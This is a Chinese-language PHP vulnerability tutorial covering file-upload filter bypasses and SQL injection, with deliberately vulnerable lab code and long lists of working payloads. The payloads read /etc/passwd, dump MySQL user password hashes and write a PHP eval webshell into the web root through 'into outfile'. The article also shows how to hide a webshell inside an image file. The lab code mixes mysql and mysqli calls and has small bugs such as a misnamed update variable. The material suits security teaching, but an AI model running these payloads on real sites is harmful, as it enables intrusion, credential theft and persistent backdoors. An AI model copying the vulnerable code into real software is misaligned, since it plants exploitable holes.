站長(zhǎng)資訊網(wǎng)
本篇文章給大家?guī)砹岁P(guān)于PHP漏洞的相關(guān)知識(shí),其中主要給大家總結(jié)介紹PHP的常見漏洞代碼都有哪些,非常全面詳細(xì),下面一起來看一下,希望對(duì)需要的朋友有所幫助。
漏洞總結(jié)
PHP 文件上傳漏洞
只驗(yàn)證MIME類型: 代碼中驗(yàn)證了上傳的MIME類型,繞過方式使用Burp抓包,將上傳的一句話小馬*.php中的Content-Type:application/php,修改成Content-Type: image/png然后上傳.
<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./"); if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { // 判斷 content-type 的類型,如果是image/png則通過 if($_FILES['upload_file']['type'] == 'image/png') { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']; if (move_uploaded_file($temp_file, $img_path)) echo "上傳完成."; else echo "上傳出錯(cuò)."; } } } ?> <body> <form enctype="multipart/form-data" method="post"> <input type="file" name="upload_file"> <input type="submit" name="submit" value="上傳"> </form> </body>
登錄后復(fù)制
白名單的繞過: 白名單就是允許上傳某種類型的文件,該方式比較安全,抓包上傳php后門,然后將文件名改為.jpg即可上傳成功,但是有時(shí)候上傳后的文件會(huì)失效無法拿到Shell.
<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./"); if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $allow_ext = array(".jpg",".png",".jpeg"); $file_name = trim($_FILES['upload_file']['name']); // 取出文件名 $file_ext = strrchr($file_name, '.'); $file_ext = str_ireplace('::$DATA', '', $file_ext); //去除字符串::$DATA $file_ext = strtolower($file_ext); // 轉(zhuǎn)換為小寫 $file_ext = trim($file_ext); // 首尾去空 if(in_array($file_ext, $allow_ext)) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext; if (move_uploaded_file($temp_file,$img_path)) echo "上傳完成: {$img_path} <br>"; else echo "上傳失敗 <br>"; } } } ?> <body> <form enctype="multipart/form-data" method="post"> <input type="file" name="upload_file"> <input type="submit" name="submit" value="上傳"> </form> </body>
登錄后復(fù)制
白名單驗(yàn)證文件頭: 本關(guān)主要是允許jpg/png/gif這三種文件的傳輸,且代碼中檢測(cè)了文件頭的2字節(jié)內(nèi)容,我們只需要將文件的頭兩個(gè)字節(jié)修改為圖片的格式就可以繞過.
通常JPEG/JPG: FF D8 | PNG:89 50 | GIF:47 49 以JPEG為例,我們?cè)谝痪湓捘抉R的開頭添加兩個(gè)11也就是二進(jìn)制的3131,然后將.php修改為.jpg,使用Brup抓包發(fā)送到Repeater模塊,將HEX編碼3131改為FFD8點(diǎn)Send后成功上傳JPG.
<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./"); function getReailFileType($filename) { $file = fopen($filename, "rb"); $bin = fread($file, 2); fclose($file); $strInfo = @unpack("C2chars", $bin); $typeCode = intval($strInfo['chars1'].$strInfo['chars2']); $fileType = ''; switch($typeCode) { case 255216: $fileType = 'jpg'; break; case 13780: $fileType = 'png'; break; case 7173: $fileType = 'gif'; break; default: $fileType = 'unknown'; } return $fileType; } if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $temp_file = $_FILES['upload_file']['tmp_name']; $file_type = getReailFileType($temp_file); if($file_type == 'unknown') { echo "上傳失敗 <br>"; }else { $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type; if(move_uploaded_file($temp_file,$img_path)) echo "上傳完成 <br>"; } } } ?> <body> <form enctype="multipart/form-data" method="post"> <input type="file" name="upload_file"> <input type="submit" name="submit" value="上傳"> </form> </body>
登錄后復(fù)制
繞過檢測(cè)文件頭: 這種方式是通過文件頭部起始位置進(jìn)行匹配的從而判斷是否上傳,我們可以通過在上傳文件前面追加合法的文件頭進(jìn)行繞過,例如在文件開頭部位加上GIF89a<?php phpinfo();?>即可完成繞過,或者如果是xffxd8xff我們需要在文件開頭先寫上%ff%d8%ff<?php phpinfo(); ?>然后,選擇特殊字符,右擊CONVERT->URL->URL-Decode編碼后釋放.
<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./"); function getReailFileType($filename) { $fh = fopen($filename, "rb"); if($fh) { $bytes = fread($fh,6); fclose($fh); if(substr($bytes,0,3) == "xffxd8xff" or substr($bytes,0,3)=="x3fx3fx3f"){ return "image/jpeg"; } if($bytes == "x89PNGx0dx0a"){ return "image/png"; } if($bytes == "GIF87a" or $bytes == "GIF89a"){ return "image/gif"; } } return 'unknown'; } if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $temp_file = $_FILES['upload_file']['tmp_name']; $file_type = getReailFileType($temp_file); echo "狀態(tài): {$file_type} "; if($file_type == 'unknown') { echo "上傳失敗 <br>"; }else { $file_name = $_FILES['upload_file']['name']; $img_path = UPLOAD_PATH . "/" . $file_name; if(move_uploaded_file($temp_file,$img_path)) echo "上傳 {$img_path} 完成 <br>"; } } } ?> <body> <form enctype="multipart/form-data" method="post"> <input type="file" name="upload_file"> <input type="submit" name="submit" value="上傳"> </form> </body>
登錄后復(fù)制
圖像檢測(cè)繞過: 通過使用圖像函數(shù),檢測(cè)文件是否為圖像,如需上傳則需要保持圖像的完整性,所以無法通過追加文件頭的方式繞過,需要制作圖片木馬上傳.
針對(duì)這種上傳方式的繞過我們可以將圖片與FIG文件合并在一起copy /b pic.gif+shell.php 1.php上傳即可繞過.
<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./"); function getReailFileType($filename) { // 檢查是否為圖像 if(@getimagesize($filename)) { if(@imagecreatefromgif($filename)){ return "image/gif"; } if(@imagecreatefrompng($filename)){ return "image/png"; } if(@imagecreatefromjpeg($filename)){ return "image/jpeg"; } } return 'unknown'; } if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $temp_file = $_FILES['upload_file']['tmp_name']; $file_type = getReailFileType($temp_file); echo "狀態(tài): {$file_type} "; if($file_type == 'unknown') { echo "上傳失敗 <br>"; }else { $file_name = $_FILES['upload_file']['name']; $img_path = UPLOAD_PATH . "/" . $file_name; if(move_uploaded_file($temp_file,$img_path)) echo "上傳 {$img_path} 完成 <br>"; } } } ?> <body> <form enctype="multipart/form-data" method="post"> <input type="file" name="upload_file"> <input type="submit" name="submit" value="上傳"> </form> </body>
登錄后復(fù)制
上傳條件競(jìng)爭(zhēng): 這里是條件競(jìng)爭(zhēng),先將文件上傳到服務(wù)器,然后判斷文件后綴是否在白名單里,如果在則重命名,否則刪除,因此我們可以上傳1.php只需要在它刪除之前訪問即可,可以利用burp的intruder模塊不斷上傳,然后我們不斷的訪問刷新該地址即可
<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./"); if(isset($_POST['submit'])) { $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; $file_ext = substr($file_name,strrpos($file_name,".")+1); $upload_file = UPLOAD_PATH . '/' . $file_name; if(move_uploaded_file($temp_file, $upload_file)) { if(in_array($file_ext, $ext_arr)) { $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext; rename($upload_file, $img_path); echo "上傳完成. <br>"; }else { unlink($upload_file); echo "上傳失敗. <br>"; } } } ?> <body> <form enctype="multipart/form-data" method="post"> <input type="file" name="upload_file"> <input type="submit" name="submit" value="上傳"> </form> </body>
登錄后復(fù)制
PHP 注入漏洞
基本查詢語句
搭建SQL注入演練環(huán)境,首先確保MySQL版本為MySQL 5.7以上,并導(dǎo)入下方的數(shù)據(jù)庫腳本自動(dòng)創(chuàng)建相應(yīng)的數(shù)據(jù)庫文件.
drop database if exists lyshark; create database lyshark; use lyshark; drop table if exists local_user; create table local_user( id int(10) primary key not null, username varchar(100) not null, password varchar(100) not null, usremail varchar(100) not null, usertype int(1) default 0 ); alert table local_user character set utf8; insert into lyshark.local_user(id,username,password,usremail) VALUES(1,"admin",md5("123123"),"admin@163.com"), (2,"lyshark",md5("adsdfw2345"),"lyshark@163.com"),(3,"guest",md5("12345678"),"guest@126.com"), (4,"Dumb",md5("458322456"),"Dumb@blib.com"),(5,"Angelina",md5("GIs92834"),"angelina@mkic.com"), (6,"Dummy",md5("HIQWu28934"),"dummy@cboos.com"),(7,"batman",md5("suw&*("),"batmain@gmail.com"), (8,"dhakkan",md5("swui16834"),"dhakakan@umail.com"),(9,"nacki",md5("fsie92*("),"cbooks@emial.com"), (10,"wuhaxp",md5("sadwq"),"cookiec@345.com"),(11,"cpiwu",md5("sadwq"),"myaccce@345.com");
登錄后復(fù)制
接著安裝好PHP7.0或以上版本的環(huán)境,并創(chuàng)建index.php文件,寫入以下測(cè)試代碼,數(shù)據(jù)庫密碼請(qǐng)自行修改.
<!DOCTYPE html> <html> <head> <meta charset="utf8"> <title>SQL 注入測(cè)試代碼</title> </head> <?php header("Content-type: text/html;charset=utf8"); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { $id = $_GET['id']; if(isset($id)) { $sql = "select * from local_user where id='$id' limit 0,1"; $query = mysqli_query($connect,$sql); if($query) $row = mysqli_fetch_array($query); } } ?> <body> <table border="1"> <tr> <th>序號(hào)</th><th>用戶賬號(hào)</th><th>用戶密碼</th><th>用戶郵箱</th><th>權(quán)限</th> </tr> <tr> <td><?php echo $row['id']; ?></td> <td><?php echo $row['username']; ?></td> <td><?php echo $row['password']; ?></td> <td><?php echo $row['usremail']; ?></td> <td><?php echo $row['usertype']; ?></td> </tr> </table><br> <?php echo '<hr><b> 后端執(zhí)行SQL語句: </b>' . $sql; ?> </body> </html>
登錄后復(fù)制
Union 查詢字段個(gè)數(shù): Union可以用于一個(gè)或多個(gè)SELECT的結(jié)果集,但是他有一個(gè)條件,就是兩個(gè)select查詢語句的查詢必須要有相同的列才可以執(zhí)行,利用這個(gè)特性我們可以進(jìn)行對(duì)比查詢,也就是說當(dāng)我們union select的列與它查詢的列相同時(shí),頁面返回正常.
首先我們猜測(cè),當(dāng)前字段數(shù)為4的時(shí)候頁面無返回,也就說明表字段數(shù)必然是大于4的,接著增加一個(gè)字段,查詢1,2,3,4,5時(shí)頁面顯示正常,說明表結(jié)構(gòu)是5個(gè)字段的.
index.php?id=1' and 1=0 union select 1,2,3,4 --+ index.php?id=1' and 1=0 union select 1,2,3,4,5 --+ index.php?id=1' and 1=0 union select null,null,null,null,null --+
登錄后復(fù)制
Order By查詢字段個(gè)數(shù): 在SQL語句中是對(duì)結(jié)果集的指定列進(jìn)行排序,比如我們想讓結(jié)果集按照第一列排序就是order by 1按照第二列排序order by 2依次類推,按照這個(gè)原理我們來判斷他的字段數(shù),如果我們按照第1列進(jìn)行排序數(shù)據(jù)庫會(huì)返回正常,但是當(dāng)我們按照第100列排序,因?yàn)閿?shù)據(jù)庫中并不存在第100列,從而報(bào)錯(cuò)或無法正常顯示.
首先我們猜測(cè)數(shù)據(jù)庫有6個(gè)字段,嘗試根據(jù)第6行進(jìn)行排序發(fā)現(xiàn)數(shù)據(jù)無法顯示,說明是小于6的,我們繼續(xù)使用5測(cè)試,此時(shí)返回了結(jié)果.
index.php?id=1' and 1 order by 6 --+ index.php?id=1' and 1 order by 5 --+
登錄后復(fù)制
大部分程序只會(huì)調(diào)用數(shù)據(jù)庫查詢的第一條語句進(jìn)行查詢?nèi)缓蠓祷?如果想看到的數(shù)據(jù)是在第二條語句中,如果我們想看到我們想要的數(shù)據(jù)有兩種方法,第一種是讓第一條數(shù)據(jù)返回假,第二種是通過sql語句直接返回我們想要的數(shù)據(jù).
第一種我們讓第一個(gè)查詢的結(jié)果始終為假,通過使用and 0來實(shí)現(xiàn),或者通過limit語句,limit在mysql中是用來分頁的,通過他可以從查詢出來的數(shù)據(jù)中獲取我們想要的數(shù)據(jù).
index.php?id=1' and 0 union select null,null,null,null,null --+ index.php?id=1' and 0 union select null,version(),null,null,null --+ index.php?id=1' union select null,null,null,null,null limit 1,1 --+ index.php?id=1' union select null,version(),null,null,null limit 1,1 --+
登錄后復(fù)制
查全部數(shù)據(jù)庫名稱: MySQL默認(rèn)將所有表數(shù)據(jù)放入information_schema.schemata這個(gè)表中進(jìn)行存儲(chǔ),我們可以查詢這個(gè)表中的數(shù)據(jù)從而找出當(dāng)前系統(tǒng)中所有的數(shù)據(jù)庫名稱,通過控制limit中的參數(shù)即可爆出所有數(shù)據(jù)庫.
index.php?id=1' and 0 union select 1,1,database(),1,1 --+ index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 0,1 --+ index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 1,1 --+ index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 2,1 --+
登錄后復(fù)制
查詢表中名稱: 通過使用group_concat可以返回查詢的所有結(jié)果,因?yàn)槲覀冃枰ㄟ^命名判斷該我們需要的敏感數(shù)據(jù).
# 通過 limit 限定條件每次只輸出一個(gè)表名稱 index.php?id=1' and 0 union select 1,2,3,4,table_name from information_schema.tables where table_schema='lyshark' limit 0,1 --+ index.php?id=1' and 0 union select 1,2,3,4,table_name from information_schema.tables where table_schema='lyshark' limit 1,1 --+ # 通過 concat 函數(shù)一次性輸出所有表 index.php?id=1' and 0 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema='lyshark' --+
登錄后復(fù)制
查詢表中字段: 通過使用table_schema和table_name指定查詢條件,即可查詢到表中字段與數(shù)據(jù).
# 查詢出lyshark數(shù)據(jù)庫local_user表中的,所有字段 index.php?id=1' and 0 union select 1,2,3,4,group_concat(column_name) from information_schema.columns > where table_schema='lyshark' and table_name='local_user' --+ # 每次讀取出一個(gè)表中字段,使用limit進(jìn)行遍歷 index.php?id=1' and 0 union select 1,2,3,4,column_name from information_schema.columns > where table_schema='lyshark' and table_name='local_user' limit 0,1 --+ index.php?id=1' and 0 union select 1,2,3,4,column_name from information_schema.columns > where table_schema='lyshark' and table_name='local_user' limit 1,1 --+
登錄后復(fù)制
查詢表中數(shù)據(jù): 通過上面的語句我們可以確定數(shù)據(jù)庫名稱,數(shù)據(jù)表,以及表中字段名稱,接著可以進(jìn)行讀取表中數(shù)據(jù).
index.php?id=1' and 0 union select 1,Host,Password,4,5 from mysql.user limit 0,1--+ index.php?id=1' and 0 union select 1,Host,Password,4,5 from mysql.user limit 1,1--+ index.php?id=1' and 0 union select 1,2,3,group_concat(id,username),5 from lyshark.users --+
登錄后復(fù)制
常用的查詢語句: 除此以外,我們還可以使用以下常用判斷條件的配合實(shí)現(xiàn)對(duì)數(shù)據(jù)庫其他權(quán)限的進(jìn)一步注入.
# ----------------------------------------------------------------------------------- # 判斷注入點(diǎn): 注入點(diǎn)的判斷有多種形式,我們可以通過提交and/or/+-等符號(hào)來判斷. index.php?id=1' and 1=1 --+ # 提交and判斷注入 index.php?id=1' and 1=0 --+ index.php?id=1%2b1 # 提交加號(hào)判斷注入 index.php?id=2-1 # 提交減號(hào)判斷注入 index.php?id=1 and sleep(5) # 延時(shí)判斷諸如點(diǎn) # ----------------------------------------------------------------------------------- # 判斷ROOT權(quán)限: 判斷數(shù)據(jù)庫是否具有ROOT權(quán)限,如果返回了查詢結(jié)果說明具有權(quán)限. index.php?id=1' and ord(mid(user(),1,1)) = 114 --+ # ----------------------------------------------------------------------------------- # 判斷權(quán)限大小: 如果結(jié)果返回正常,說明具有讀寫權(quán)限,如果返回錯(cuò)誤應(yīng)該是管理員給數(shù)據(jù)庫帳戶降權(quán)了. index.php?id=1' and(select count(*) from mysql.user) > 0 # ----------------------------------------------------------------------------------- # 查詢管理密碼: 查詢MySQL的管理密碼,這里的#末尾警號(hào),是注釋符的意思,說明后面的都是注釋. index.php?id=1' and 0 union select 1,host,user,password,5 from mysql.user --+ // 5.6以前版本 index.php?id=1' and 0 union select 1,host,user,authentication_string,5 from mysql.user --+ // 5.7以后版本 # ----------------------------------------------------------------------------------- # 向主站寫入一句話: 可以寫入一句話后門,但在linux系統(tǒng)上目錄必須具有讀寫和執(zhí)行權(quán)限. index.php?id=1' and 0 union select 1,load_file("/etc/passwd"),3,4,5 --+ index.php?id=1' union select 1,load_file("/etc/passwd"),3,4,5 into outfile '/var/www/html/a.txt'--+ index.php?id=1' union select 1,"<?php phpinfo();?>",3,4,5 into outfile '/var/www/html/shell.php' --+ index.php?id=1' union select 1,2,3,4,load_file(char(11,116,46,105,110,105)) into outfile '/var/www/html/b.txt' --+ # ----------------------------------------------------------------------------------- # 利用MySQL引擎寫一句話: 通過使用MySQL的存儲(chǔ)引擎,以MySQL身份寫入一句話 create table shell(cmd text); insert into shell(cmd) values('<?php @eval($_POST[cmd]) ?>'); select cmd from shell into outfile('/var/www/html/eval.php'); # ----------------------------------------------------------------------------------- # 常用判斷語句: 下面是一些常用的注入查詢語句,包括查詢主機(jī)名等敏感操作. index.php?id=1' union select 1,1,load_file("/etc/passwd") // 加載指定文件 index.php?id=1' union select 1,1,@@datadir // 判斷數(shù)據(jù)庫目錄 index.php?id=1' union select 1,1,@@basedir // 判斷安裝根路徑 index.php?id=1' union select 1,1,@@hostname // 判斷主機(jī)名 index.php?id=1' union select 1,1,@@version // 判斷數(shù)據(jù)庫版本 index.php?id=1' union select 1,1,@@version_compile_os // 判斷系統(tǒng)類型(Linux) index.php?id=1' union select 1,1,@@version_compile_machine // 判斷系統(tǒng)體系(x86) index.php?id=1' union select 1,1,user() // 曝出系統(tǒng)用戶 index.php?id=1' union select 1,1,database() // 曝出當(dāng)前數(shù)據(jù)庫
登錄后復(fù)制
GET 注入
簡(jiǎn)單的注入測(cè)試: 本關(guān)中沒有對(duì)代碼進(jìn)行任何的過濾.
<!DOCTYPE html> <html> <head> <meta charset="utf8"> <title>SQL 注入測(cè)試代碼</title> </head> <body> <?php function getCurrentUrl() { $scheme = $_SERVER['REQUEST_SCHEME']; // 協(xié)議 $domain = $_SERVER['HTTP_HOST']; // 域名 $requestUri = $_SERVER['REQUEST_URI']; // 請(qǐng)求參數(shù) $currentUrl = $scheme . "://" . $domain . $requestUri; return urldecode($currentUrl); } ?> <?php header("Content-type: text/html;charset=utf8"); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { $id = $_GET['id']; if(isset($id)) { $sql = "select username,password from local_user where id='$id' limit 0,1"; $query = mysqli_query($connect,$sql); if($query) { $row = mysqli_fetch_array($query); if($row) { echo "<font size='5'>"; echo "賬號(hào): {$row['username']} <br>"; echo "密碼: {$row['password']} <br>"; echo "</font>"; echo "后端執(zhí)行語句: {$sql} <br>"; $URL = getCurrentUrl(); echo "后端URL參數(shù): {$URL} <br>"; } else { echo "后端執(zhí)行語句: {$sql} <br>"; print_r(mysql_error()); } } } } ?> </body> </html>
登錄后復(fù)制
SQL語句沒有經(jīng)過任何過濾,或者是過濾不嚴(yán)格,會(huì)導(dǎo)致注入的發(fā)生.
--------------------------------------------------------------------------------- $sql = "select username,password from local_user where id=$id limit 0,1"; http://127.0.0.1/index.php?id=-1 union select 1,version() --+ $sql = "select username,password from local_user where id=($id) limit 0,1"; http://127.0.0.1/index.php?id=-1) union select 1,version() --+ http://127.0.0.1/index.php?id=1) and 1 =(0) union select 1,version() --+ --------------------------------------------------------------------------------- $sql = "select username,password from local_user where id='$id' limit 0,1"; http://127.0.0.1/index.php?id=-1 union select 1,version() --+ $sql = "select username,password from local_user where id=('$id') limit 0,1"; http://127.0.0.1/index.php?id=-1') union select 1,version() --+ http://127.0.0.1/index.php?id=1') and '1'=('0') union select 1,version() --+ $sql = "select username,password from local_user where id=(('$id')) limit 0,1"; http://127.0.0.1/index.php?id=-1')) union select 1,version() --+ --------------------------------------------------------------------------------- $id = '"' . $id . "'"; $sql = "select username,password from local_user where id=($id) limit 0,1"; http://127.0.0.1/index.php?id=-1") union select 1,version() --+ http://127.0.0.1/index.php?id=1") and "1"=("0") union select 1,version() --+
登錄后復(fù)制
POST 輸入框注入:
<!DOCTYPE html> <html> <head> <meta charset="utf8"> </head> <body> <form action="" method="post"> 賬號(hào): <input style="width:1000px;height:20px;" type="text" name="uname" value=""/><br> 密碼: <input style="width:1000px;height:20px;" type="password" name="passwd" value=""/> <input type="submit" name="submit" value="提交表單" /> </form> <?php header("Content-type: text/html;charset=utf8"); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { $uname=$_POST['uname']; $passwd=$_POST['passwd']; $passwd = md5($passwd); if(isset($_POST['uname']) && isset($_POST['passwd'])) { $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $query = mysqli_query($connect,$sql); if($query) { $row = mysqli_fetch_array($query); if($row) { echo "<br>歡迎用戶: {$row['username']} 密碼: {$row['password']} <br><br>"; echo "后端執(zhí)行語句: {$sql} <br>"; } else { echo "<br>后端執(zhí)行語句: {$sql} <br>"; } } } } ?> </body> </html>
登錄后復(fù)制
簡(jiǎn)單的進(jìn)行查詢測(cè)試,此處的查詢語句沒有經(jīng)過任何的過濾限制,所以呢你可以直接脫褲子了.
# --------------------------------------------------------------------------------------------------------- # SQL語句 $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1"; # --------------------------------------------------------------------------------------------------------- # 爆出字段數(shù) admin' order by 1 # admin' order by 2 -- admin' and 1 union select 1,2,3 # admin' and 1 union select 1,2 # # 爆出數(shù)據(jù)庫 admin ' and 0 union select null,database() # admin' and 0 union select 1,version() # # 爆出所有表名稱(需要注意數(shù)據(jù)庫編碼格式) set character_set_database=utf8; set collation_database= utf8_general_ci alter table local_user convert to character set utf8; ' union select null,table_name from information_schema.tables where table_schema='lyshark' limit 0,1 # ' union select null,table_name from information_schema.tables where table_schema='lyshark' limit 1,1 # # 爆出表中字段 ' union select null,column_name from information_schema.columns where table_name='local_user' limit 0,1 # ' union select null,column_name from information_schema.columns where table_name='local_user' limit 1,1 # # 繼續(xù)爆出所有的用戶名密碼 ' union select null,group_concat(username,0x3a,password) from local_user # # --------------------------------------------------------------------------------------------------------- # 雙注入-字符型 # 此類注入很簡(jiǎn)單,只需要閉合前面的")而后面則使用#注釋掉即可 $uname = '"' . $uname . '"'; $passwd = '"' . $passwd . '"'; $sql="select username,password FROM local_user WHERE username=($uname) and password=($passwd) LIMIT 0,1"; #payload admin") order by 2 # admin") and 0 union select 1,version() # admin") and 0 union select 1,database() # # --------------------------------------------------------------------------------------------------------- # POST型的-雙注入 # $uname = '"' . $uname . '"'; $passwd = '"' . $passwd . '"'; $sql="select username,password FROM local_user WHERE username=$uname and password=$passwd LIMIT 0,1"; admin" and 0 union select 1,version() #
登錄后復(fù)制
Usage-Agent 注入: Usagen-Agent是客戶請(qǐng)求時(shí)攜帶的請(qǐng)求頭,該頭部是客戶端可控,如果有帶入數(shù)據(jù)庫的相關(guān)操作,則可能會(huì)產(chǎn)生SQL注入問題.
建庫> create table User_Agent(u_name varchar(20),u_addr varchar(20),u_agent varchar(256)); <!DOCTYPE html> <html> <head> <meta charset="utf8"> <title>SQL 注入測(cè)試代碼</title> </head> <body> <form action="" method="post"> 賬號(hào): <input style="width:1000px;height:20px;" type="text" name="uname" value=""/><br> 密碼: <input style="width:1000px;height:20px;" type="password" name="passwd" value=""/> <input type="submit" name="submit" value="Submit" /> </form> <?php header("Content-type: text/html;charset=utf8"); error_reporting(0); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname=$_POST['uname']; $passwd=$_POST['passwd']; $passwd = md5($passwd); $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $query = mysqli_query($connect,$sql); if($query) { $row = mysqli_fetch_array($query); if($row) { // 獲取到用戶的Agent客戶請(qǐng)求體 $Uagent = $_SERVER['HTTP_USER_AGENT']; // REMOTE_ADDR 是調(diào)用的底層的會(huì)話ip地址,理論上是不可以偽造的 $IP = $_SERVER['REMOTE_ADDR']; echo "<br>歡迎用戶: {$row['username']} 密碼: {$row['password']} <br><br>"; echo "您的IP地址是: {$IP} <br>"; $insert_sql = "insert into User_Agent(u_name,u_addr,u_agent) values('$uname','$IP','$Uagent')"; mysqli_query($connect,$insert_sql); echo "User_Agent請(qǐng)求頭: {$Uagent} <br>"; } } } } ?> </body> </html>
登錄后復(fù)制
首先我們通過burp提交登錄請(qǐng)求,然后再登陸時(shí),修改agent請(qǐng)求頭,讓其帶入數(shù)據(jù)庫查詢.
POST /post.php HTTP/1.1 Host: 192.168.1.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 uname=admin&passwd=123123&submit=Submit
登錄后復(fù)制
修改agent驗(yàn)證,可被繞過,此處的語句帶入數(shù)據(jù)庫變?yōu)榱薸nsert into User_Agent values('1)','u_addr','u_agent')有時(shí),不存在回顯的地方即使存在注入也無法得到結(jié)果,但卻是一個(gè)安全隱患,需要引起重視.
User-Agent: 1',1,1)# uname=admin&passwd=123123&submit=Submit User-Agent: 1',1,updatexml(1,concat(0x3a,database(),0x3a),1)a)#)# uname=admin&passwd=123123&submit=Submit
登錄后復(fù)制
Cookie 注入: 該注入的產(chǎn)生原因是因?yàn)槌绦騿T沒有將COOKIE進(jìn)行合法化檢測(cè),并將其代入到了數(shù)據(jù)庫中查詢了且查詢變量是可控的,當(dāng)用戶登錄成功后會(huì)產(chǎn)生COOKIE,每次頁面刷新后端都會(huì)拿著這個(gè)COOKIE帶入數(shù)據(jù)庫查找,這是非常危險(xiǎn)的.
<!DOCTYPE html> <html> <head> <meta charset="utf8"> </head> <body> <form action="" method="post"> 賬號(hào): <input type="text" name="uname" value=""/><br> 密碼: <input type="password" name="passwd" value=""/> <input type="submit" name="submit" value="Submit" /> </form> <?php header("Content-type: text/html;charset=utf8"); error_reporting(0); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { $cookee = $_COOKIE['uname']; if($cookee) { $sql="SELECT username,password FROM local_user WHERE username='$cookee' LIMIT 0,1"; $query = mysqli_query($connect,$sql); echo "執(zhí)行SQL: " . $sql . "<br>"; if($query) { $row = mysqli_fetch_array($query); if($row) { echo "<br> COOKIE 已登錄 <br>"; echo "您的賬號(hào): " . $row['username'] . "<br>"; echo "您的密碼: " . $row['password'] . "<br>"; } } } if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname=$_POST['uname']; $passwd=$_POST['passwd']; $passwd = md5($passwd); $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $query = mysqli_query($connect,$sql); if($query) { $row = mysqli_fetch_array($query); $cookee = $row['username']; if($row) { setcookie('uname', $cookee, time() + 3600); $format = 'D d M Y - H:i:s'; $timestamp = time() + 3600; echo "COOKIE已設(shè)置: " . date($format, $timestamp); } } } } ?> </body> </html>
登錄后復(fù)制
以下是注入Payload語句,當(dāng)?shù)顷懗晒?抓包然后刷新頁面,然后構(gòu)造惡意的登錄COOKIE,即可實(shí)現(xiàn)利用.
Cookie: uname=admin' and 0 union select database(),2--+ Cookie: uname=admin' and 0 union select version(),2--+
登錄后復(fù)制
update-xml注入:
<!DOCTYPE html> <html> <head> <meta charset="utf8"> <title>SQL 注入測(cè)試代碼</title> </head> <body> <form action="" method="post"> 賬號(hào): <input style="width:1000px;height:20px;" type="text" name="uname" value=""/><br> 密碼: <input style="width:1000px;height:20px;" type="password" name="passwd" value=""/> <input type="submit" name="submit" value="提交表單" /> </form> <?php error_reporting(0); header("Content-type: text/html;charset=utf8"); function Check($value) { if(!empty($value)) { // 如果結(jié)果不為空,則取出其前十五個(gè)字符 18 $value = substr($value,0,15); } // 當(dāng)magic_quotes_gpc=On的時(shí)候,函數(shù)get_magic_quotes_gpc()就會(huì)返回1 // 當(dāng)magic_quotes_gpc=Off的時(shí)候,函數(shù)get_magic_quotes_gpc()就會(huì)返回0 if(get_magic_quotes_gpc()) { // 刪除由 addslashes() 函數(shù)添加的反斜杠 $value = stripslashes($value); } if(!ctype_digit($value)) { // ctype_digit()判斷是不是數(shù)字,是數(shù)字就返回true,否則返回false // mysql_real_escape_string()轉(zhuǎn)義 SQL 語句中使用的字符串中的特殊字符。 $value = "'" . mysql_real_escape_string($value) . "."; } else $value = intval($value); return $value; } $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname=Check($_POST['uname']); $passwd=$_POST['passwd']; $passwd = md5($passwd); $sql="select username,password FROM local_user WHERE username=$uname LIMIT 0,1"; $query = mysqli_query($connect,$sql); if($query) { $row = mysqli_fetch_array($query); if($row) { $rows = $row['username']; $udate = "UPDATE local_user SET password = '$passwd' WHERE username='$rows'"; mysql_query($update); if(mysql_error()) { print_r(mysql_error()); } echo "后端執(zhí)行語句: {$sql} <br>"; } else { echo "<br>后端執(zhí)行語句: {$sql} <br>"; } } } } ?> </body> </html>
登錄后復(fù)制
推薦學(xué)習(xí):《PHP視頻教程》
